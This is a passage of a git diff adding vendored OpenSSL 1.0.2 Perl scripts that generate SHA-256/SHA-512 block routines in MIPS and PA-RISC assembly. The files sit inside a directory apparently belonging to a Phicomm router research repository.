+	and	$tmp2,$e
+	$SRL	$tmp0,$e,@Sigma1[1]
+	xor	$h,$tmp1
+	$SLL	$tmp1,$e,`$SZ*8-@Sigma1[1]`
+	xor	$h,$tmp0
+	$SRL	$tmp0,$e,@Sigma1[2]
+	xor	$h,$tmp1
+	$SLL	$tmp1,$e,`$SZ*8-@Sigma1[0]`
+	xor	$h,$tmp0
+	xor	$tmp2,$g			# Ch(e,f,g)
+	xor	$tmp0,$tmp1,$h			# Sigma1(e)
+
+	$SRL	$h,$a,@Sigma0[0]
+	$ADDU	$T1,$tmp2
+	$LD	$tmp2,`$i*$SZ`($Ktbl)		# K[$i]
+	$SLL	$tmp1,$a,`$SZ*8-@Sigma0[2]`
+	$ADDU	$T1,$tmp0
+	$SRL	$tmp0,$a,@Sigma0[1]
+	xor	$h,$tmp1
+	$SLL	$tmp1,$a,`$SZ*8-@Sigma0[1]`
+	xor	$h,$tmp0
+	$SRL	$tmp0,$a,@Sigma0[2]
+	xor	$h,$tmp1
+	$SLL	$tmp1,$a,`$SZ*8-@Sigma0[0]`
+	xor	$h,$tmp0
+	and	$tmp0,$b,$c
+	xor	$h,$tmp1			# Sigma0(a)
+	xor	$tmp1,$b,$c
+#endif
+	$ST	@X[0],`($i%16)*$SZ`($sp)	# offload to ring buffer
+	$ADDU	$h,$tmp0
+	and	$tmp1,$a
+	$ADDU	$T1,$tmp2			# +=K[$i]
+	$ADDU	$h,$tmp1			# +=Maj(a,b,c)
+	$ADDU	$d,$T1
+	$ADDU	$h,$T1
+___
+$code.=<<___ if ($i>=13);
+	$LD	@X[3],`(($i+3)%16)*$SZ`($sp)	# prefetch from ring buffer
+___
+}
+
+sub BODY_16_XX {
+my $i=@_[0];
+my ($tmp0,$tmp1,$tmp2,$tmp3)=(@X[4],@X[5],@X[6],@X[7]);
+
+$code.=<<___;
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	$SRL	$tmp2,@X[1],@sigma0[0]		# Xupdate($i)
+	$ROTR	$tmp0,@X[1],@sigma0[1]
+	$ADDU	@X[0],@X[9]			# +=X[i+9]
+	xor	$tmp2,$tmp0
+	$ROTR	$tmp0,@X[1],@sigma0[2]
+
+	$SRL	$tmp3,@X[14],@sigma1[0]
+	$ROTR	$tmp1,@X[14],@sigma1[1]
+	xor	$tmp2,$tmp0			# sigma0(X[i+1])
+	$ROTR	$tmp0,@X[14],@sigma1[2]
+	xor	$tmp3,$tmp1
+	$ADDU	@X[0],$tmp2
+#else
+	$SRL	$tmp2,@X[1],@sigma0[0]		# Xupdate($i)
+	$ADDU	@X[0],@X[9]			# +=X[i+9]
+	$SLL	$tmp1,@X[1],`$SZ*8-@sigma0[2]`
+	$SRL	$tmp0,@X[1],@sigma0[1]
+	xor	$tmp2,$tmp1
+	$SLL	$tmp1,`@sigma0[2]-@sigma0[1]`
+	xor	$tmp2,$tmp0
+	$SRL	$tmp0,@X[1],@sigma0[2]
+	xor	$tmp2,$tmp1
+
+	$SRL	$tmp3,@X[14],@sigma1[0]
+	xor	$tmp2,$tmp0			# sigma0(X[i+1])
+	$SLL	$tmp1,@X[14],`$SZ*8-@sigma1[2]`
+	$ADDU	@X[0],$tmp2
+	$SRL	$tmp0,@X[14],@sigma1[1]
+	xor	$tmp3,$tmp1
+	$SLL	$tmp1,`@sigma1[2]-@sigma1[1]`
+	xor	$tmp3,$tmp0
+	$SRL	$tmp0,@X[14],@sigma1[2]
+	xor	$tmp3,$tmp1
+#endif
+	xor	$tmp3,$tmp0			# sigma1(X[i+14])
+	$ADDU	@X[0],$tmp3
+___
+	&BODY_00_15(@_);
+}
+
+$FRAMESIZE=16*$SZ+16*$SZREG;
+$SAVED_REGS_MASK = ($flavour =~ /nubi/i) ? 0xc0fff008 : 0xc0ff0000;
+
+$code.=<<___;
+#ifdef OPENSSL_FIPSCANISTER
+# include <openssl/fipssyms.h>
+#endif
+
+#if defined(__mips_smartmips) && !defined(_MIPS_ARCH_MIPS32R2)
+#define _MIPS_ARCH_MIPS32R2
+#endif
+
+.text
+.set	noat
+#if !defined(__mips_eabi) && (!defined(__vxworks) || defined(__pic__))
+.option	pic2
+#endif
+
+.align	5
+.globl	sha${label}_block_data_order
+.ent	sha${label}_block_data_order
+sha${label}_block_data_order:
+	.frame	$sp,$FRAMESIZE,$ra
+	.mask	$SAVED_REGS_MASK,-$SZREG
+	.set	noreorder
+___
+$code.=<<___ if ($flavour =~ /o32/i);	# o32 PIC-ification
+	.cpload	$pf
+___
+$code.=<<___;
+	$PTR_SUB $sp,$FRAMESIZE
+	$REG_S	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_S	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_S	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_S	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_S	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_S	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_S	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_S	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_S	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_S	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);	# optimize non-nubi prologue
+	$REG_S	$s3,$FRAMESIZE-11*$SZREG($sp)
+	$REG_S	$s2,$FRAMESIZE-12*$SZREG($sp)
+	$REG_S	$s1,$FRAMESIZE-13*$SZREG($sp)
+	$REG_S	$s0,$FRAMESIZE-14*$SZREG($sp)
+	$REG_S	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	$PTR_SLL @X[15],$len,`log(16*$SZ)/log(2)`
+___
+$code.=<<___ if ($flavour !~ /o32/i);	# non-o32 PIC-ification
+	.cplocal	$Ktbl
+	.cpsetup	$pf,$zero,sha${label}_block_data_order
+___
+$code.=<<___;
+	.set	reorder
+	la	$Ktbl,K${label}		# PIC-ified 'load address'
+
+	$LD	$A,0*$SZ($ctx)		# load context
+	$LD	$B,1*$SZ($ctx)
+	$LD	$C,2*$SZ($ctx)
+	$LD	$D,3*$SZ($ctx)
+	$LD	$E,4*$SZ($ctx)
+	$LD	$F,5*$SZ($ctx)
+	$LD	$G,6*$SZ($ctx)
+	$LD	$H,7*$SZ($ctx)
+
+	$PTR_ADD @X[15],$inp		# pointer to the end of input
+	$REG_S	@X[15],16*$SZ($sp)
+	b	.Loop
+
+.align	5
+.Loop:
+	${LD}l	@X[0],$MSB($inp)
+	${LD}r	@X[0],$LSB($inp)
+___
+for ($i=0;$i<16;$i++)
+{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); push(@X,shift(@X)); }
+$code.=<<___;
+	b	.L16_xx
+.align	4
+.L16_xx:
+___
+for (;$i<32;$i++)
+{ &BODY_16_XX($i,@V); unshift(@V,pop(@V)); push(@X,shift(@X)); }
+$code.=<<___;
+	and	@X[6],0xfff
+	li	@X[7],$lastK
+	.set	noreorder
+	bne	@X[6],@X[7],.L16_xx
+	$PTR_ADD $Ktbl,16*$SZ		# Ktbl+=16
+
+	$REG_L	@X[15],16*$SZ($sp)	# restore pointer to the end of input
+	$LD	@X[0],0*$SZ($ctx)
+	$LD	@X[1],1*$SZ($ctx)
+	$LD	@X[2],2*$SZ($ctx)
+	$PTR_ADD $inp,16*$SZ
+	$LD	@X[3],3*$SZ($ctx)
+	$ADDU	$A,@X[0]
+	$LD	@X[4],4*$SZ($ctx)
+	$ADDU	$B,@X[1]
+	$LD	@X[5],5*$SZ($ctx)
+	$ADDU	$C,@X[2]
+	$LD	@X[6],6*$SZ($ctx)
+	$ADDU	$D,@X[3]
+	$LD	@X[7],7*$SZ($ctx)
+	$ADDU	$E,@X[4]
+	$ST	$A,0*$SZ($ctx)
+	$ADDU	$F,@X[5]
+	$ST	$B,1*$SZ($ctx)
+	$ADDU	$G,@X[6]
+	$ST	$C,2*$SZ($ctx)
+	$ADDU	$H,@X[7]
+	$ST	$D,3*$SZ($ctx)
+	$ST	$E,4*$SZ($ctx)
+	$ST	$F,5*$SZ($ctx)
+	$ST	$G,6*$SZ($ctx)
+	$ST	$H,7*$SZ($ctx)
+
+	bne	$inp,@X[15],.Loop
+	$PTR_SUB $Ktbl,`($rounds-16)*$SZ`	# rewind $Ktbl
+
+	$REG_L	$ra,$FRAMESIZE-1*$SZREG($sp)
+	$REG_L	$fp,$FRAMESIZE-2*$SZREG($sp)
+	$REG_L	$s11,$FRAMESIZE-3*$SZREG($sp)
+	$REG_L	$s10,$FRAMESIZE-4*$SZREG($sp)
+	$REG_L	$s9,$FRAMESIZE-5*$SZREG($sp)
+	$REG_L	$s8,$FRAMESIZE-6*$SZREG($sp)
+	$REG_L	$s7,$FRAMESIZE-7*$SZREG($sp)
+	$REG_L	$s6,$FRAMESIZE-8*$SZREG($sp)
+	$REG_L	$s5,$FRAMESIZE-9*$SZREG($sp)
+	$REG_L	$s4,$FRAMESIZE-10*$SZREG($sp)
+___
+$code.=<<___ if ($flavour =~ /nubi/i);
+	$REG_L	$s3,$FRAMESIZE-11*$SZREG($sp)
+	$REG_L	$s2,$FRAMESIZE-12*$SZREG($sp)
+	$REG_L	$s1,$FRAMESIZE-13*$SZREG($sp)
+	$REG_L	$s0,$FRAMESIZE-14*$SZREG($sp)
+	$REG_L	$gp,$FRAMESIZE-15*$SZREG($sp)
+___
+$code.=<<___;
+	jr	$ra
+	$PTR_ADD $sp,$FRAMESIZE
+.end	sha${label}_block_data_order
+
+.rdata
+.align	5
+K${label}:
+___
+if ($SZ==4) {
+$code.=<<___;
+	.word	0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5
+	.word	0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5
+	.word	0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3
+	.word	0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174
+	.word	0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc
+	.word	0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da
+	.word	0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7
+	.word	0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967
+	.word	0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13
+	.word	0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85
+	.word	0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3
+	.word	0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070
+	.word	0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5
+	.word	0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3
+	.word	0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208
+	.word	0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
+___
+} else {
+$code.=<<___;
+	.dword	0x428a2f98d728ae22, 0x7137449123ef65cd
+	.dword	0xb5c0fbcfec4d3b2f, 0xe9b5dba58189dbbc
+	.dword	0x3956c25bf348b538, 0x59f111f1b605d019
+	.dword	0x923f82a4af194f9b, 0xab1c5ed5da6d8118
+	.dword	0xd807aa98a3030242, 0x12835b0145706fbe
+	.dword	0x243185be4ee4b28c, 0x550c7dc3d5ffb4e2
+	.dword	0x72be5d74f27b896f, 0x80deb1fe3b1696b1
+	.dword	0x9bdc06a725c71235, 0xc19bf174cf692694
+	.dword	0xe49b69c19ef14ad2, 0xefbe4786384f25e3
+	.dword	0x0fc19dc68b8cd5b5, 0x240ca1cc77ac9c65
+	.dword	0x2de92c6f592b0275, 0x4a7484aa6ea6e483
+	.dword	0x5cb0a9dcbd41fbd4, 0x76f988da831153b5
+	.dword	0x983e5152ee66dfab, 0xa831c66d2db43210
+	.dword	0xb00327c898fb213f, 0xbf597fc7beef0ee4
+	.dword	0xc6e00bf33da88fc2, 0xd5a79147930aa725
+	.dword	0x06ca6351e003826f, 0x142929670a0e6e70
+	.dword	0x27b70a8546d22ffc, 0x2e1b21385c26c926
+	.dword	0x4d2c6dfc5ac42aed, 0x53380d139d95b3df
+	.dword	0x650a73548baf63de, 0x766a0abb3c77b2a8
+	.dword	0x81c2c92e47edaee6, 0x92722c851482353b
+	.dword	0xa2bfe8a14cf10364, 0xa81a664bbc423001
+	.dword	0xc24b8b70d0f89791, 0xc76c51a30654be30
+	.dword	0xd192e819d6ef5218, 0xd69906245565a910
+	.dword	0xf40e35855771202a, 0x106aa07032bbd1b8
+	.dword	0x19a4c116b8d2d0c8, 0x1e376c085141ab53
+	.dword	0x2748774cdf8eeb99, 0x34b0bcb5e19b48a8
+	.dword	0x391c0cb3c5c95a63, 0x4ed8aa4ae3418acb
+	.dword	0x5b9cca4f7763e373, 0x682e6ff3d6b2b8a3
+	.dword	0x748f82ee5defb2fc, 0x78a5636f43172f60
+	.dword	0x84c87814a1f0ab72, 0x8cc702081a6439ec
+	.dword	0x90befffa23631e28, 0xa4506cebde82bde9
+	.dword	0xbef9a3f7b2c67915, 0xc67178f2e372532b
+	.dword	0xca273eceea26619c, 0xd186b8c721c0c207
+	.dword	0xeada7dd6cde0eb1e, 0xf57d4f7fee6ed178
+	.dword	0x06f067aa72176fba, 0x0a637dc5a2c898a6
+	.dword	0x113f9804bef90dae, 0x1b710b35131c471b
+	.dword	0x28db77f523047d84, 0x32caab7b40c72493
+	.dword	0x3c9ebe0a15c9bebc, 0x431d67c49c100d4c
+	.dword	0x4cc5d4becb3e42b6, 0x597f299cfc657e2a
+	.dword	0x5fcb6fab3ad6faec, 0x6c44198c4a475817
+___
+}
+$code.=<<___;
+.asciiz	"SHA${label} for MIPS, CRYPTOGAMS by <appro\@openssl.org>"
+.align	5
+
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-parisc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-parisc.pl
new file mode 100755
index 0000000..fc0e15b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-parisc.pl
@@ -0,0 +1,793 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA256/512 block procedure for PA-RISC.
+
+# June 2009.
+#
+# SHA256 performance is >75% better than gcc 3.2 generated code on
+# PA-7100LC. Compared to code generated by vendor compiler this
+# implementation is almost 70% faster in 64-bit build, but delivers
+# virtually same performance in 32-bit build on PA-8600.
+#
+# SHA512 performance is >2.9x better than gcc 3.2 generated code on
+# PA-7100LC, PA-RISC 1.1 processor. Then implementation detects if the
+# code is executed on PA-RISC 2.0 processor and switches to 64-bit
+# code path delivering adequate peformance even in "blended" 32-bit
+# build. Though 64-bit code is not any faster than code generated by
+# vendor compiler on PA-8600...
+#
+# Special thanks to polarhome.com for providing HP-UX account.
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+} else {
+	$LEVEL		="1.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+}
+
+if ($output =~ /512/) {
+	$func="sha512_block_data_order";
+	$SZ=8;
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=(1,  8, 7);
+	@sigma1=(19,61, 6);
+	$rounds=80;
+	$LAST10BITS=0x017;
+	$LD="ldd";
+	$LDM="ldd,ma";
+	$ST="std";
+} else {
+	$func="sha256_block_data_order";
+	$SZ=4;
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 7,18, 3);
+	@sigma1=(17,19,10);
+	$rounds=64;
+	$LAST10BITS=0x0f2;
+	$LD="ldw";
+	$LDM="ldwm";
+	$ST="stw";
+}
+
+$FRAME=16*$SIZE_T+$FRAME_MARKER;# 16 saved regs + frame marker
+				#                 [+ argument transfer]
+$XOFF=16*$SZ+32;		# local variables
+$FRAME+=$XOFF;
+$XOFF+=$FRAME_MARKER;		# distance between %sp and local variables
+
+$ctx="%r26";	# zapped by $a0
+$inp="%r25";	# zapped by $a1
+$num="%r24";	# zapped by $t0
+
+$a0 ="%r26";
+$a1 ="%r25";
+$t0 ="%r24";
+$t1 ="%r29";
+$Tbl="%r31";
+
+@V=($A,$B,$C,$D,$E,$F,$G,$H)=("%r17","%r18","%r19","%r20","%r21","%r22","%r23","%r28");
+
+@X=("%r1", "%r2", "%r3", "%r4", "%r5", "%r6", "%r7", "%r8",
+    "%r9", "%r10","%r11","%r12","%r13","%r14","%r15","%r16",$inp);
+
+sub ROUND_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+$code.=<<___;
+	_ror	$e,$Sigma1[0],$a0
+	and	$f,$e,$t0
+	_ror	$e,$Sigma1[1],$a1
+	addl	$t1,$h,$h
+	andcm	$g,$e,$t1
+	xor	$a1,$a0,$a0
+	_ror	$a1,`$Sigma1[2]-$Sigma1[1]`,$a1
+	or	$t0,$t1,$t1		; Ch(e,f,g)
+	addl	@X[$i%16],$h,$h
+	xor	$a0,$a1,$a1		; Sigma1(e)
+	addl	$t1,$h,$h
+	_ror	$a,$Sigma0[0],$a0
+	addl	$a1,$h,$h
+
+	_ror	$a,$Sigma0[1],$a1
+	and	$a,$b,$t0
+	and	$a,$c,$t1
+	xor	$a1,$a0,$a0
+	_ror	$a1,`$Sigma0[2]-$Sigma0[1]`,$a1
+	xor	$t1,$t0,$t0
+	and	$b,$c,$t1
+	xor	$a0,$a1,$a1		; Sigma0(a)
+	addl	$h,$d,$d
+	xor	$t1,$t0,$t0		; Maj(a,b,c)
+	`"$LDM	$SZ($Tbl),$t1" if ($i<15)`
+	addl	$a1,$h,$h
+	addl	$t0,$h,$h
+
+___
+}
+
+sub ROUND_16_xx {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h)=@_;
+$i-=16;
+$code.=<<___;
+	_ror	@X[($i+1)%16],$sigma0[0],$a0
+	_ror	@X[($i+1)%16],$sigma0[1],$a1
+	addl	@X[($i+9)%16],@X[$i],@X[$i]
+	_ror	@X[($i+14)%16],$sigma1[0],$t0
+	_ror	@X[($i+14)%16],$sigma1[1],$t1
+	xor	$a1,$a0,$a0
+	_shr	@X[($i+1)%16],$sigma0[2],$a1
+	xor	$t1,$t0,$t0
+	_shr	@X[($i+14)%16],$sigma1[2],$t1
+	xor	$a1,$a0,$a0		; sigma0(X[(i+1)&0x0f])
+	xor	$t1,$t0,$t0		; sigma1(X[(i+14)&0x0f])
+	$LDM	$SZ($Tbl),$t1
+	addl	$a0,@X[$i],@X[$i]
+	addl	$t0,@X[$i],@X[$i]
+___
+$code.=<<___ if ($i==15);
+	extru	$t1,31,10,$a1
+	comiclr,<> $LAST10BITS,$a1,%r0
+	ldo	1($Tbl),$Tbl		; signal end of $Tbl
+___
+&ROUND_00_15($i+16,$a,$b,$c,$d,$e,$f,$g,$h);
+}
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.ALIGN	64
+L\$table
+___
+$code.=<<___ if ($SZ==8);
+	.WORD	0x428a2f98,0xd728ae22,0x71374491,0x23ef65cd
+	.WORD	0xb5c0fbcf,0xec4d3b2f,0xe9b5dba5,0x8189dbbc
+	.WORD	0x3956c25b,0xf348b538,0x59f111f1,0xb605d019
+	.WORD	0x923f82a4,0xaf194f9b,0xab1c5ed5,0xda6d8118
+	.WORD	0xd807aa98,0xa3030242,0x12835b01,0x45706fbe
+	.WORD	0x243185be,0x4ee4b28c,0x550c7dc3,0xd5ffb4e2
+	.WORD	0x72be5d74,0xf27b896f,0x80deb1fe,0x3b1696b1
+	.WORD	0x9bdc06a7,0x25c71235,0xc19bf174,0xcf692694
+	.WORD	0xe49b69c1,0x9ef14ad2,0xefbe4786,0x384f25e3
+	.WORD	0x0fc19dc6,0x8b8cd5b5,0x240ca1cc,0x77ac9c65
+	.WORD	0x2de92c6f,0x592b0275,0x4a7484aa,0x6ea6e483
+	.WORD	0x5cb0a9dc,0xbd41fbd4,0x76f988da,0x831153b5
+	.WORD	0x983e5152,0xee66dfab,0xa831c66d,0x2db43210
+	.WORD	0xb00327c8,0x98fb213f,0xbf597fc7,0xbeef0ee4
+	.WORD	0xc6e00bf3,0x3da88fc2,0xd5a79147,0x930aa725
+	.WORD	0x06ca6351,0xe003826f,0x14292967,0x0a0e6e70
+	.WORD	0x27b70a85,0x46d22ffc,0x2e1b2138,0x5c26c926
+	.WORD	0x4d2c6dfc,0x5ac42aed,0x53380d13,0x9d95b3df
+	.WORD	0x650a7354,0x8baf63de,0x766a0abb,0x3c77b2a8
+	.WORD	0x81c2c92e,0x47edaee6,0x92722c85,0x1482353b
+	.WORD	0xa2bfe8a1,0x4cf10364,0xa81a664b,0xbc423001
+	.WORD	0xc24b8b70,0xd0f89791,0xc76c51a3,0x0654be30
+	.WORD	0xd192e819,0xd6ef5218,0xd6990624,0x5565a910
+	.WORD	0xf40e3585,0x5771202a,0x106aa070,0x32bbd1b8
+	.WORD	0x19a4c116,0xb8d2d0c8,0x1e376c08,0x5141ab53
+	.WORD	0x2748774c,0xdf8eeb99,0x34b0bcb5,0xe19b48a8
+	.WORD	0x391c0cb3,0xc5c95a63,0x4ed8aa4a,0xe3418acb
+	.WORD	0x5b9cca4f,0x7763e373,0x682e6ff3,0xd6b2b8a3
+	.WORD	0x748f82ee,0x5defb2fc,0x78a5636f,0x43172f60
+	.WORD	0x84c87814,0xa1f0ab72,0x8cc70208,0x1a6439ec
+	.WORD	0x90befffa,0x23631e28,0xa4506ceb,0xde82bde9
+	.WORD	0xbef9a3f7,0xb2c67915,0xc67178f2,0xe372532b
+	.WORD	0xca273ece,0xea26619c,0xd186b8c7,0x21c0c207
+	.WORD	0xeada7dd6,0xcde0eb1e,0xf57d4f7f,0xee6ed178
+	.WORD	0x06f067aa,0x72176fba,0x0a637dc5,0xa2c898a6
+	.WORD	0x113f9804,0xbef90dae,0x1b710b35,0x131c471b
+	.WORD	0x28db77f5,0x23047d84,0x32caab7b,0x40c72493
+	.WORD	0x3c9ebe0a,0x15c9bebc,0x431d67c4,0x9c100d4c
+	.WORD	0x4cc5d4be,0xcb3e42b6,0x597f299c,0xfc657e2a
+	.WORD	0x5fcb6fab,0x3ad6faec,0x6c44198c,0x4a475817
+___
+$code.=<<___ if ($SZ==4);
+	.WORD	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.WORD	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.WORD	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.WORD	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.WORD	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.WORD	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.WORD	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.WORD	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.WORD	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.WORD	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.WORD	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.WORD	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.WORD	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.WORD	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.WORD	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.WORD	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+___
+$code.=<<___;
+
+	.EXPORT	$func,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR
+	.ALIGN	64
+$func
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-16*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=18
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+	$PUSH	%r7,`-$FRAME+4*$SIZE_T`(%sp)
+	$PUSH	%r8,`-$FRAME+5*$SIZE_T`(%sp)
+	$PUSH	%r9,`-$FRAME+6*$SIZE_T`(%sp)
+	$PUSH	%r10,`-$FRAME+7*$SIZE_T`(%sp)
+	$PUSH	%r11,`-$FRAME+8*$SIZE_T`(%sp)
+	$PUSH	%r12,`-$FRAME+9*$SIZE_T`(%sp)
+	$PUSH	%r13,`-$FRAME+10*$SIZE_T`(%sp)
+	$PUSH	%r14,`-$FRAME+11*$SIZE_T`(%sp)
+	$PUSH	%r15,`-$FRAME+12*$SIZE_T`(%sp)
+	$PUSH	%r16,`-$FRAME+13*$SIZE_T`(%sp)
+	$PUSH	%r17,`-$FRAME+14*$SIZE_T`(%sp)
+	$PUSH	%r18,`-$FRAME+15*$SIZE_T`(%sp)
+
+	_shl	$num,`log(16*$SZ)/log(2)`,$num
+	addl	$inp,$num,$num		; $num to point at the end of $inp
+
+	$PUSH	$num,`-$FRAME_MARKER-4*$SIZE_T`(%sp)	; save arguments
+	$PUSH	$inp,`-$FRAME_MARKER-3*$SIZE_T`(%sp)
+	$PUSH	$ctx,`-$FRAME_MARKER-2*$SIZE_T`(%sp)
+
+	blr	%r0,$Tbl
+	ldi	3,$t1
+L\$pic
+	andcm	$Tbl,$t1,$Tbl		; wipe privilege level
+	ldo	L\$table-L\$pic($Tbl),$Tbl
+___
+$code.=<<___ if ($SZ==8 && $SIZE_T==4);
+	ldi	31,$t1
+	mtctl	$t1,%cr11
+	extrd,u,*= $t1,%sar,1,$t1	; executes on PA-RISC 1.0
+	b	L\$parisc1
+	nop
+___
+$code.=<<___;
+	$LD	`0*$SZ`($ctx),$A	; load context
+	$LD	`1*$SZ`($ctx),$B
+	$LD	`2*$SZ`($ctx),$C
+	$LD	`3*$SZ`($ctx),$D
+	$LD	`4*$SZ`($ctx),$E
+	$LD	`5*$SZ`($ctx),$F
+	$LD	`6*$SZ`($ctx),$G
+	$LD	`7*$SZ`($ctx),$H
+
+	extru	$inp,31,`log($SZ)/log(2)`,$t0
+	sh3addl	$t0,%r0,$t0
+	subi	`8*$SZ`,$t0,$t0
+	mtctl	$t0,%cr11		; load %sar with align factor
+
+L\$oop
+	ldi	`$SZ-1`,$t0
+	$LDM	$SZ($Tbl),$t1
+	andcm	$inp,$t0,$t0		; align $inp
+___
+	for ($i=0;$i<15;$i++) {		# load input block
+	$code.="\t$LD	`$SZ*$i`($t0),@X[$i]\n";		}
+$code.=<<___;
+	cmpb,*=	$inp,$t0,L\$aligned
+	$LD	`$SZ*15`($t0),@X[15]
+	$LD	`$SZ*16`($t0),@X[16]
+___
+	for ($i=0;$i<16;$i++) {		# align data
+	$code.="\t_align	@X[$i],@X[$i+1],@X[$i]\n";	}
+$code.=<<___;
+L\$aligned
+	nop	; otherwise /usr/ccs/bin/as is confused by below .WORD
+___
+
+for($i=0;$i<16;$i++)	{ &ROUND_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+L\$rounds
+	nop	; otherwise /usr/ccs/bin/as is confused by below .WORD
+___
+for(;$i<32;$i++)	{ &ROUND_16_xx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	bb,>=	$Tbl,31,L\$rounds	; end of $Tbl signalled?
+	nop
+
+	$POP	`-$FRAME_MARKER-2*$SIZE_T`(%sp),$ctx	; restore arguments
+	$POP	`-$FRAME_MARKER-3*$SIZE_T`(%sp),$inp
+	$POP	`-$FRAME_MARKER-4*$SIZE_T`(%sp),$num
+	ldo	`-$rounds*$SZ-1`($Tbl),$Tbl		; rewind $Tbl
+
+	$LD	`0*$SZ`($ctx),@X[0]	; load context
+	$LD	`1*$SZ`($ctx),@X[1]
+	$LD	`2*$SZ`($ctx),@X[2]
+	$LD	`3*$SZ`($ctx),@X[3]
+	$LD	`4*$SZ`($ctx),@X[4]
+	$LD	`5*$SZ`($ctx),@X[5]
+	addl	@X[0],$A,$A
+	$LD	`6*$SZ`($ctx),@X[6]
+	addl	@X[1],$B,$B
+	$LD	`7*$SZ`($ctx),@X[7]
+	ldo	`16*$SZ`($inp),$inp	; advance $inp
+
+	$ST	$A,`0*$SZ`($ctx)	; save context
+	addl	@X[2],$C,$C
+	$ST	$B,`1*$SZ`($ctx)
+	addl	@X[3],$D,$D
+	$ST	$C,`2*$SZ`($ctx)
+	addl	@X[4],$E,$E
+	$ST	$D,`3*$SZ`($ctx)
+	addl	@X[5],$F,$F
